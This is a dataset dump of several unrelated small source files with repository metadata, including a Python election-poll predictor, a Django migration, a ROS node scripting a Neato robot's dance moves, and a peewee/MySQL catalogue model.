] | wos.mateusz16@gmail.com |
f8184270f36e3f165d97bbb247f6f0b508fc5810 | ba7d84b4b85be8c3221468527757e264e64616b9 | /tests/hammytest.py | b5f03afc22f1e60ade3aca0eb505d0bf88fd3fe8 | [] | no_license | gomesr/timetracker | c18eb4b6f33e08eadd72971216b16560ef085aa1 | ce57a0791727a3b06e4b167fbeb3cb3e558ff2f1 | refs/heads/master | 2021-01-22T23:58:20.247393 | 2010-12-12T01:16:54 | 2010-12-12T01:16:54 | 1,130,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py |
import unittest
from trackers.hammy import HamsterTracker
from hamster import client
class HammyTest(unittest.TestCase):
def setUp(self):
self.tracker = HamsterTracker()
def test_create_100_activites(self):
tags = []
ids = []
try:
for i in range(1,100):
ids.append(self.tracker.start("activity-%d" % i,
"",
"some elaborate desciption",
tags))
finally:
# clean up!
for id in ids:
self.tracker.storage.remove_fact(id)
| [
"rodneygomes@gmail.com"
] | rodneygomes@gmail.com |
46589e8d5188e4fd04f3a679ec039f8a771d07c1 | e39c2b92e3ed9c614b9b91a641c0053edb1eb2ee | /Turner6.py | a256a6e2a6c54531be4d7b0ab35231a008b5a790 | [] | no_license | EMajec/Election-Counter | c1c04a07153a9b807d6c53c59bdd16b5cdb2da75 | 4a6220bdf5e4274520531f2233b41dd95b176670 | refs/heads/master | 2021-01-12T09:17:19.250341 | 2016-12-19T00:28:34 | 2016-12-19T00:28:34 | 76,814,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,998 | py | #Ethan Turner
#November 30 2016
#Proposed Points: 14/15 because all pieces of the project are complete except for multiplier (However it is commented in for review just incase)
#This function reads data in the
#data in the poll file and puts it into a 2D list
#which it then returns.
#The parameter is the name of the file with the poll info.
def get_poll_data(polls_filename):
polls_file = open(polls_filename,'r')
#initialize our 2D list to have no rows initially
poll_info = []
#the first line is just the names of the columns, so we can read and ignore it
polls_file.readline()
#looping through every line in the file
for line in polls_file:
line = line.rstrip('\n') #get rid of the newline character
vals = line.split(',') #split it into a list by the comma - this row should now have 6 items in it, and it can be one of our rows
poll_info.append(vals) #throw the new row into the 2D list
return poll_info
#this function should create a 2D list from the csv file
#given by the state_filename parameter
#return the 2D list that you create here
def get_state_data(state_filename): #sets function to open evperstate file
state_file = open(state_filename,'r') #open file
state_info = [] #creates an empty chart for information to go into a 2D list
state_file.readline() #reads everyline in the file
for row in state_file: #goes through each line in the file
row = row.rstrip('\n') #strips each row of the breaks
vals = row.split(',') #separates each item with a comma
state_info.append(vals) #adds each of the rows into the empty chart for the 2D list
return state_info
#TODO: you need to fill in the rest of this function
#this function should calculate (and return) the average difference
#between Clinton's and Trump's vote % in the state
#whose name is passed as the state_name parameter (which is just a string)
#The poll_data parameter is the 2D list with all of the poll info in it
def get_avg_diff(state_name, poll_data):
# multiplier = 1 This was for the Multiplier
# multchart = [] This was for the Multiplier and would hold the days column
hillary = [] #creates an empty list of hillary votes
trump = [] #creates an empty list of trump votes
f = poll_data #makes my life easier
for row in f: #goes through the first row of the data line
for column in row: #goes through the columns
if column == state_name: #finds the searched state name rows and only runs these columns
hillary += [row[2]] #adds hillary vote column to hillary's empty chart
trump += [row[3]] #adds trump votes column to trumps empty chart
# multchart += row[1] added the days to the multiplier cjart
# if multchart > 243: old are worth less
# multiplier = 1
# elif multchart > 121: more recent are worth more
# multiplier = 2
# elif multchart < 121: most recent are worth even more
# multiplier = 3
hillary = map(int, hillary) #converts stringed numbers in hillary's chart to integers
hillary = sum(hillary) #adds all of her votes
# hillary *= multiplier
trump = map(int, trump) #converts stringed numbers in trump's chart to integers
trump = sum(trump) #adds all of his votes
# trump *= multiplier
average = hillary - trump #finds out who had the most votes
if average > 0: #if hillary had the most votes it will set hillary to the average to pass into another function
average = "Hillary" #sets hillary as the state winner
print('-----------------------------------------')
print("Hillary will win", state_name) #fun addition to see who won the state
elif average < 0: #if trump had the most votes it will set trump to the average to pass into another function
print('-----------------------------------------')
print("Trump will win", state_name) #fun addition to see who won the state
average = "Trump" #sets trump as the state winner
else: #fun addition, just incase there is the chance of a tie or someother situation, VP will break the tie
average = "VP"
print("The vice president will decide.")
print("Hillary:",hillary, '| Trump:', trump) #prints the final score for each state
print('-----------------------------------------')
return average
#TODO: you need to fill in the rest of this function
def main():
polls_2D_list = get_poll_data('president_polls2016.csv') #sets variable for polls file
state_2D_list = get_state_data('ev_per_state2016.csv') #sets variable for states file
trumpcard = 0 #sets trumps electoral vote score
hillyes = 0 #sets hillaries electoral vote score
for row in state_2D_list: #goes through each row in the state list to get the state name
state_column = row[0] #gets the state name
average = get_avg_diff(state_column,polls_2D_list) #runs the state name through the function above to get a returned winner of the state
if average == "Trump": #if the return value is Trump won the state it will add to trumps overall score
points = int(row[1]) #finds amount of electoral votes trump should gain
trumpcard += points #adds electoral votes to trump's total count
if average == "Hillary": #if the return value is Hillary won the state it will add to hillarys overall score
points = int(row[1]) #finds amount of electoral votes hillary should gain
hillyes += points #adds electoral votes to hillarys total count
if hillyes > trumpcard: #determines who is the winner based on total electoral votes, sets hillary as the winner and tells total votes
print('*******************************************')
print("Hillary will win with", hillyes, "votes")
print("Trump will lose with", trumpcard, "votes")
print('*******************************************')
else: #sets trump to the winner if not Hillary and tells total votes
print('*******************************************')
print("Trump will win with", trumpcard, "votes")
print("Hillary will lose with", hillyes, "votes")
print('*******************************************')
#TODO: loop through the state_2D_list
#for each state, call get_avg_diff to calculate the average difference
#in the polls for each candidate and total up the number of electoral
#votes you project each candidate to win.
#print out the final results for your prediction
#this function can be used to test the functions individually
#before making them all work together in the final program
#TODO: change this to instead just call main when your main function is ready to be tested
main()
| [
"noreply@github.com"
] | noreply@github.com |
05c5693d3b24a5c3fd147316f1f2cfeaba19014b | 5c39f5ac529e9f292ba0e4965fd684d4c6eefe8a | /migrations/0001_initial.py | 8570a25dfd79013e6c9c3202871e7bdc877c28d4 | [] | no_license | joshianshul2/csv_db | 6d24dec8bdcd8f00115a8729d5036beb47994d0e | e7215002c0a2fb8cadd0d4087b8651b1ec9e30ea | refs/heads/master | 2023-04-21T19:46:56.941399 | 2021-05-11T17:29:38 | 2021-05-11T17:29:38 | 356,846,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,962 | py | # Generated by Django 3.2 on 2021-04-07 05:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AvgMaster',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('county', models.CharField(max_length=255)),
('state', models.CharField(max_length=255)),
('NetPrAr', models.FloatField(default=0.0)),
('Rate', models.FloatField()),
('UserPercentage', models.FloatField(default=0.0)),
('FinaleValue', models.FloatField(default=0.0)),
('accountId', models.BigIntegerField()),
('acres', models.FloatField()),
('adTargetingCountyId', models.BigIntegerField()),
('address', models.CharField(max_length=255)),
('baths', models.BigIntegerField()),
('beds', models.BigIntegerField()),
('brokerCompany', models.CharField(max_length=255)),
('brokerName', models.CharField(max_length=255)),
('Url', models.URLField(max_length=255)),
('city', models.CharField(max_length=255)),
('cityID', models.BigIntegerField()),
('companyLogoDocumentId', models.BigIntegerField()),
('countyId', models.BigIntegerField()),
('description', models.TextField(max_length=255)),
('hasHouse', models.BooleanField()),
('hasVideo', models.BooleanField()),
('hasVirtualTour', models.BigIntegerField()),
('imageCount', models.BigIntegerField()),
('imageAltTextDisplay', models.CharField(max_length=255)),
('isHeadlineAd', models.BooleanField()),
('lwPropertyId', models.BigIntegerField()),
('isALC', models.BigIntegerField()),
('latitude', models.FloatField()),
('longitude', models.FloatField()),
('price', models.FloatField()),
('types', models.TextField(max_length=255)),
('status', models.CharField(max_length=20)),
('status1', models.CharField(max_length=255)),
('zip', models.BigIntegerField()),
('Descrpt', models.TextField(default='!', max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='PropertyMaster',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('accountId', models.BigIntegerField()),
('acres', models.FloatField()),
('adTargetingCountyId', models.BigIntegerField()),
('address', models.CharField(max_length=255)),
('baths', models.BigIntegerField()),
('beds', models.BigIntegerField()),
('brokerCompany', models.CharField(max_length=255)),
('brokerName', models.CharField(max_length=255)),
('Url', models.URLField(max_length=255)),
('city', models.CharField(max_length=255)),
('cityID', models.BigIntegerField()),
('companyLogoDocumentId', models.BigIntegerField()),
('county', models.CharField(max_length=255)),
('countyId', models.BigIntegerField()),
('description', models.TextField(max_length=255)),
('hasHouse', models.BooleanField()),
('hasVideo', models.BooleanField()),
('hasVirtualTour', models.BigIntegerField()),
('imageCount', models.BigIntegerField()),
('imageAltTextDisplay', models.CharField(max_length=255)),
('isHeadlineAd', models.BooleanField()),
('lwPropertyId', models.BigIntegerField()),
('isALC', models.BigIntegerField()),
('latitude', models.FloatField()),
('longitude', models.FloatField()),
('price', models.FloatField()),
('types', models.TextField(max_length=255)),
('state', models.CharField(max_length=255)),
('status', models.CharField(max_length=20)),
('status1', models.CharField(max_length=255)),
('zip', models.BigIntegerField()),
('Rate', models.FloatField()),
('NetPrAr', models.FloatField(default=0.0)),
('Descrpt', models.TextField(default='!', max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='StatusMaster',
fields=[
('status', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"joshi.anshul2@gmail.com"
] | joshi.anshul2@gmail.com |
74c0ab18df35dff67f6a923901b4a3934b4750a1 | d369c19c36ebef0d9ce77b5bf70e09af32ec27be | /python/LearnPythonTheHardWay/067_ex17_hydrangea.py | 409685d43138439627b1013438869b75c6e205d6 | [] | no_license | sds-coders/codepractice | 9dcf012d1523527015b03b28cc58e936998a47e0 | 7642b2f74e387e8e311c8034e313fae0f68e967d | refs/heads/master | 2020-04-16T10:12:54.505056 | 2019-03-24T13:50:10 | 2019-03-24T13:50:10 | 165,495,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # -*- coding: utf-8 -*-
from sys import argv
from os.path import exists
script, from_file, to_file = argv
print "%s에서 %s로 복사합니다." % (from_file, to_file)
# 이 두 줄은 한 줄로도 쓸 수 있습니다. 어떻게 할까요?
in_file = open(from_file)
indata = in_file.read()
print "입력 파일은 %d 바이트입니다." % len(indata)
print "출력 파일이 존재하나요? %r" % exists(to_file)
print "준비되었습니다. 계속하려면 리턴 키를, 취소하려면 CTRL-C를 누르세요."
raw_input()
out_file = open(to_file, 'w')
out_file.write(indata)
print "좋습니다. 모두 완료되었습니다."
out_file.close()
in_file.close()
# open(to_file, 'w').write(open(from_file).read())
| [
"shjun4541@hotmail.com"
] | shjun4541@hotmail.com |
0ba3f4e3ea6946c44b606566dfbf9e684624bdcc | 304511ae7300e1e246c86980cfcdbd52b9d5180e | /main.py | f5f5713b9b166aab4bbcde412f6ffd3452dfd2e7 | [] | no_license | ryanbalog/project5 | 0dea169409cb7d538b609fb1974c6184e9b2f122 | 071a507d21906d9fde22d157d22f5868e792b6a3 | refs/heads/master | 2022-12-06T21:15:37.763781 | 2020-08-29T16:42:52 | 2020-08-29T16:42:52 | 291,309,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | '''
Ryan Balog
CS2420
Project 5
'''
from binarysearchtree import BinarySearchTree
VALUES = [21, 26, 30, 9, 4, 14, 28, 18, 15, 10, 2, 3, 7]
REMOVABLES = [21, 9, 4, 18, 15, 7]
def main():
'''Driver for program'''
tree = BinarySearchTree()
for val in VALUES:
tree.add(val)
for item in tree.preorder():
print(item, end=", ")
print("\n")
print(tree)
for item in REMOVABLES:
tree.remove(item)
print(tree)
if __name__ == "__main__":
main()
| [
"ryanbalog3@gmail.com"
] | ryanbalog3@gmail.com |
13efb73b8dd5b05d0a8276930b8f422fc28fab20 | f4db22a9946e270ceb464e8fe80de1cf3130e30c | /chairbot/src/neato_robot/neato_node/nodes/halloween.py | 90ab480f0edd39736c44196be290478393f89387 | [
"MIT"
] | permissive | charisma-lab/chairbot | 6f81d8f6e0943138333b7be2fbeea72675ca4147 | 7fbdd047afd2cda43d27935d905a443d0d820244 | refs/heads/master | 2020-03-29T10:30:44.724934 | 2018-11-24T01:03:01 | 2018-11-24T01:03:01 | 149,808,681 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,509 | py | #!/usr/bin/env python
import roslib; roslib.load_manifest("neato_node")
import rospy
from math import sin,cos
from geometry_msgs.msg import Twist
import time
from std_msgs.msg import UInt16
from sensor_msgs.msg import Joy
from std_msgs.msg import Int8
from neato_driver.neato_driver import Botvac
class NeatoNode:
def __init__(self):
""" Start up connection to the Neato Robot. """
rospy.init_node('teleop04', anonymous=True)
self.port = rospy.get_param('~port1 ', "/dev/ttyACM1")
rospy.loginfo("Using port: %s"%(self.port))
self.robot = Botvac(self.port)
rospy.Subscriber("/joy04", Joy, self.joy_handler, queue_size=10)
rospy.Subscriber("/cbon04", Int8, self.cbon04, queue_size=10)
# rospy.Subscriber('/touches02', Int8, self.touch_handler, queue_size=10)
self.Axess = (-0.0, -0.0, 1.0, -0.0, -0.0, 1.0, -0.0, -0.0)
self.Butt = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
self.SPEED = 0
self.DIST = 20
self.SPEEDSET = 0
self.SPEEDRAMP = 0
self.lastx = 0
self.lasty = 0
self.xramp = 0
self.yramp = 0
self.touch_number = -1
self.touch0 = False
self.touch1 = False
self.touch2 = False
self.touch3 = False
self.touch4 = False
self.touch5 = False
self.touch6 = False
self.touch7 = False
self.touch8 = False
def spin(self):
# main loop of driver
r = rospy.Rate(20)
while not rospy.is_shutdown():
Lft_t = self.Axess[0]
Lft_d = self.Axess[1]
Rgh_t = self.Axess[3]
Rgh_d = self.Axess[4]
AageL = self.Axess[2]
AageR = self.Axess[5]
L_R = self.Axess[6]
F_B = self.Axess[7]
sq = self.Butt[0]
xx = self.Butt[1]
ci = self.Butt[2]
tr = self.Butt[3]
self.SPEED_s = self.Butt[4]
self.SPEED_f = self.Butt[5]
AageL_Button = self.Butt[6]
AageR_Button = self.Butt[7]
share = self.Butt[8]
options = self.Butt[9]
pressL = self.Butt[10]
pressR = self.Butt[11]
power = self.Butt[12]
self.SPEED -= ((AageR-1)*10)
self.SPEED += ((AageL-1)*10)
self.SPEED = int(self.SPEED)
if (self.SPEED<0):
self.SPEED=0
elif (self.SPEED>330):
self.SPEED=330
self.SPEEDSET = self.SPEED
ll = (Lft_d*self.DIST)
rr = (Rgh_t*self.DIST)
if (rr>=0):
x = (-ll - rr)
y = (-ll + rr)
else:
x = (-ll - rr)
y = (-ll + rr)
x=int(x)
y=int(y)
speeddif = abs(self.SPEEDRAMP - self.SPEEDSET)
if (self.SPEEDRAMP<self.SPEEDSET):
self.SPEEDRAMP += (speeddif/20)
else:
self.SPEEDRAMP -= (speeddif/20)
if (self.SPEEDRAMP<0):
self.SPEEDRAMP=0
elif (self.SPEEDRAMP>330):
self.SPEEDRAMP=330
if (self.SPEEDSET > 150):
if (0<x<10):
x=10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
elif (-10<x<0):
x=-10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
if (0<y<10):
y=10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
elif (-10<y<0):
y=-10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
else:
if (0<x<5):
x=5
elif (-5<x<0):
x=-5
if (0<y<5):
y=5
elif (-5<y<0):
y=-5
#self.xramp = x
#self.yramp = y
if (self.xramp < self.lastx):
self.xramp += 1
elif (self.xramp == self.lastx):
pass
else:
self.xramp -= 1
if (self.yramp < self.lasty):
self.yramp += 1
elif (self.yramp == self.lasty):
pass
else:
self.yramp -= 1
if (x==0 and y==0):
self.SPEEDRAMP -= (self.SPEEDSET/10)
else:
if ((abs(self.xramp-x)>20) or (abs(self.yramp-y)>20)):
self.SPEEDRAMP = 50
if (self.SPEEDRAMP<0):
self.SPEEDRAMP=0
self.lastx = x
self.lasty = y
print (self.xramp, x, self.lastx, self.yramp, y, self.lasty, self.SPEEDRAMP, self.SPEEDSET)
# if (self.touch6):
self.robot.setMotors(self.xramp, self.yramp, self.SPEEDRAMP)
self.robot.flushing()
if tr == 1:
self.optiona()
if ci == 1:
self.optionb()
if xx == 1:
self.optionc()
if sq == 1:
self.optiond()
# if (self.touch6):
# pub_LED.publish(1)
# if (self.touch0 or self.touch1):
# self.left()
# if (self.touch3 or self.touch2):
# self.right()
# if (self.touch4):
# self.back()
# if (self.touch5):
# self.fwd()
# elif (self.touch7):
# pub_LED.publish(1)
# if (self.touch0 or self.touch1):
# self.leftFast()
# if (self.touch3 or self.touch2):
# self.rightFast()
# if (self.touch4):
# self.backFast()
# if (self.touch5):
# self.fwdFast()
# else:
# pub_LED.publish(0)
# wait, then do it again
r.sleep()
# shut down
self.robot.setLDS("off")
self.robot.setTestMode("off")
# SQUARE
def optiona(self):
self.lightup(1,3)
self.lightup(0,1)
self.lightup(1,1)
self.lightup(0,1)
self.lightup(1,1)
self.lightup(0,1)
self.lightup(1,1)
self.lightup(0,1)
# TRIANGLE
def optionb(self):
# self.right(325,300)# almost 120 degree
# self.fwd()
BEET=.98
#Enter
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
#03 forward
self.fwd(0,0,7*BEET)
self.fwd(0,0,BEET)
# shake
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.fwd(0,0,0.5*BEET)
#Turn pause, turn pause
self.left(400,220,3*BEET)
self.fwd(0,0,0.05*BEET)
self.left(600,250,BEET)
self.fwd(0,0,0.1*BEET)
# self.lightup(1,BEET)
# self.lightup(0,0.5*BEET)
# self.lightup(1,BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.right(300,120,3*BEET)
self.fwd(0,0,BEET)
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.fwd(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.left(300,100,2*BEET)
self.left(600,250,BEET)
self.fwd(0,0,BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.right(600,250,2*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.left(2200,150,12*BEET)
self.fwd(0,0,2*BEET)
#Thriller
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(600,250,BEET)
self.fwd(0,0,BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
#Thriller
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.right(100,200,0.5*BEET)
self.left(600,250,BEET)
self.fwd(0,0,2*BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(0,0,2*BEET)
self.left(600,250,BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
# CIRCLE IS FOR TESTING
def optionc(self):
BEET=.98
#Enter
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
# X
def optiond(self):
self.lightup()
def fwd(self,DISTANCE,SPEED,SLEEP):
self.robot.setMotors(-DISTANCE,-DISTANCE,SPEED)
rospy.sleep(SLEEP)
def back(self,DISTANCE,SPEED,SLEEP):
self.robot.setMotors(DISTANCE,DISTANCE,SPEED)
rospy.sleep(SLEEP)
def right(self,ANGLE,SPEED,SLEEP):
self.robot.setMotors(ANGLE,-ANGLE,SPEED)
rospy.sleep(SLEEP)
def left(self,ANGLE,SPEED,SLEEP):
self.robot.setMotors(-ANGLE,ANGLE,SPEED)
rospy.sleep(SLEEP)
def stop(self):
SPEED=00
self.robot.setMotors(00,00,SPEED)
rospy.sleep(1)
self.robot.setMotors(00,00,SPEED)
def lightup(self,SWITCH,BEET):
pub_LED.publish(SWITCH)
rospy.sleep(BEET)
def joy_handler(self, ps):
self.Butt = ps.buttons
self.Axess = ps.axes
def cbon04(self, on):
pub_LED.publish(on.data)
print(on.data)
if on.data == 1:
self.touch6=True
elif on.data == 0:
self.touch6=False
if __name__ == "__main__":
robot = NeatoNode()
pub_LED = rospy.Publisher("/led04", Int8, queue_size=10)
robot.spin() | [
"charisma@engr.oregonstate.edu"
] | charisma@engr.oregonstate.edu |
286cc8c250f2c2b4030ffc5e75d7d1213b47a934 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_yens.py | f7c90d82f8fc7ae9864e4492c2449f9c31d5b2f4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py |
from xai.brain.wordbase.nouns._yen import _YEN
#calss header
class _YENS(_YEN, ):
def __init__(self,):
_YEN.__init__(self)
self.name = "YENS"
self.specie = 'nouns'
self.basic = "yen"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
a31d0693760097d9ec0bfc62e4a5c4d7383c09ab | 378b200007c5d3633572b61eb3dd2180748086b7 | /chefsBackEnd/chefsBackEnd/asgi.py | d077d3550da2054b45a48c64401ec50a84113e40 | [] | no_license | jgartsu12/chefs-table-backend | 4163c2c9a2bb586d4432c332238682bf282ef967 | 71611cf17aa457f8bc9a7ec7d853c570062d22fb | refs/heads/master | 2022-12-16T04:22:30.954831 | 2020-07-08T19:24:37 | 2020-07-08T19:24:37 | 251,097,796 | 1 | 0 | null | 2022-12-08T10:13:44 | 2020-03-29T17:59:15 | Python | UTF-8 | Python | false | false | 401 | py | """
ASGI config for chefsBackEnd project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chefsBackEnd.settings')
application = get_asgi_application()
| [
"jgartsu12@gmail.com"
] | jgartsu12@gmail.com |
1ce439080e353228f843746415b1a67a0d6b4687 | 4b73dc6b31bd2e25957c70677dc6fd0135a1a43b | /03_Avanzado/Unidad_06/model/model_db.py | 9474f3ed766ea4db9d09dd0d7f51460ac86ac069 | [] | no_license | stick2yourmind/Python | 557aae4b8422104ec244dcd45123b1c0b4ed2d7a | 9629add21493bea0173fa6ed548bedb18e73fa32 | refs/heads/master | 2022-11-17T10:00:53.622658 | 2020-07-13T01:21:49 | 2020-07-13T01:21:49 | 272,263,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,503 | py | import mysql.connector
from peewee import *
import datetime
# global variables connection to db
my_sql_db = "catalogueDB"
my_sql_host = "localhost"
my_sql_port = 3306
my_sql_user = "root"
my_sql_pass = ""
my_sql_table = "RegItem"
my_sql_struct = "CREATE TABLE IF NOT EXISTS producto( id int(11) NOT NULL PRIMARY KEY \
AUTO_INCREMENT, titulo VARCHAR(128) COLLATE utf8_spanish2_ci NOT NULL, descripcion text COLLATE \
utf8_spanish2_ci NOT NULL )"
# Creating a db connection
db = MySQLDatabase(my_sql_db, host=my_sql_host, port=my_sql_port,
user=my_sql_user,
passwd=my_sql_pass)
# Access to db
class Catalogue(Model):
class Meta:
database = db
# Access to table
class RegItem(Catalogue):
titulo = TextField()
fecha = DateTimeField(default=datetime.datetime.now())
descripcion = TextField()
estado = BooleanField(default=True)
objeto = TextField()
def __str__(self):
return "El título es: " + self.titulo
def create_db_my_sql():
"""
Create a database. Its name will be my_sql_db.
Parameters
----------
my_sql_host : str
MySQL's host.
my_sql_user : str
User of host.
my_sql_pass : str
User's password.
my_sql_db : str
Database's name to create.
Returns
-------
None : None
has no return
"""
print("\t\tcreate_db_my_sql: starting")
global my_sql_db
global my_sql_host
global my_sql_user
global my_sql_pass
aux = -1
try:
my_db = mysql.connector.connect(
host=my_sql_host,
user=my_sql_user,
passwd=my_sql_pass)
my_cursor = my_db.cursor()
my_cursor.execute("CREATE DATABASE IF NOT EXISTS " + my_sql_db)
my_db.commit()
my_cursor.close()
my_db.close()
aux = 1
print("\t\tcreate_db_my_sql: DB has been created")
except:
print("\t\tcreate_db_my_sql: Error")
print("\t\tcreate_db_my_sql: finished")
return aux
def create_table_orm():
print("\t\tcreate_table_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
db.create_tables([RegItem])
db.close()
aux = 1
print("\t\tcreate_table_orm: Table has been created")
except:
print("\t\tcreate_table_orm: Error")
print("\t\tcreate_table_orm: finished")
return aux
def print_add(fn):
def console_printer(*args):
print("\t\t\tprint_add: título = ", args[0]) # args[0] primer parámetro de add_reg_orm
print("\t\t\tprint_add: descripción = ", args[1]) # args[1] segundo parámetro de add_reg_orm
aux = fn(*args) # fn(*args) add_reg_orm's return
if aux != -1:
print("\t\t\tprint_add: One register has been added by using decorator")
else:
print("\t\t\tprint_add: Register could not been added by using decorator")
return aux
return console_printer
@print_add
def add_reg_orm(titulo, descripcion):
print("\t\tadd_reg_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
obj = RegItem(titulo=titulo, descripcion=descripcion)
print("\t\t", obj)
obj = RegItem(titulo=titulo, descripcion=descripcion, objeto=str(obj))
obj.save()
db.close()
aux = 1
print("\t\tadd_reg_orm: Register has been added")
except:
print("\t\tadd_reg_orm: Error")
print("\t\tadd_reg_orm: finished")
return aux
def show_reg_orm():
print("\t\tshow_reg_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
fetched = []
query = RegItem.select(RegItem.id, RegItem.titulo, RegItem.fecha, RegItem.descripcion, RegItem.estado,
RegItem.objeto)
for item in query:
fetched.append((item.id, item.titulo, item.fecha,
item.descripcion, item.estado, item.objeto))
db.close()
print("\t\tshow_reg_orm: Data fetched returned")
aux = 1
except:
print("\t\tshow_reg_orm: Error")
print("\t\tshow_reg_orm: finished")
if aux == -1:
return aux
else:
return fetched
def print_delete(fn):
def console_printer(*args):
print("\t\t\tprint_delete: id = ", args[0]) # args[0] primer parámetro de delete_reg_orm
aux = fn(*args)
if aux != -1:
print("\t\t\tprint_delete: One register has been deleted by using decorator")
else:
print("\t\t\tprint_delete: Register could not been deleted by using decorator")
return aux
return console_printer
@print_delete
def delete_reg_orm(id_reg):
print("\t\tdelete_reg_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
deleteReg = RegItem.get(RegItem.id == int(id_reg))
deleteReg.delete_instance()
db.close()
aux = 1
print("\t\tdelete_reg_orm: Register deleted")
except:
print("\t\tdelete_reg_orm: Error")
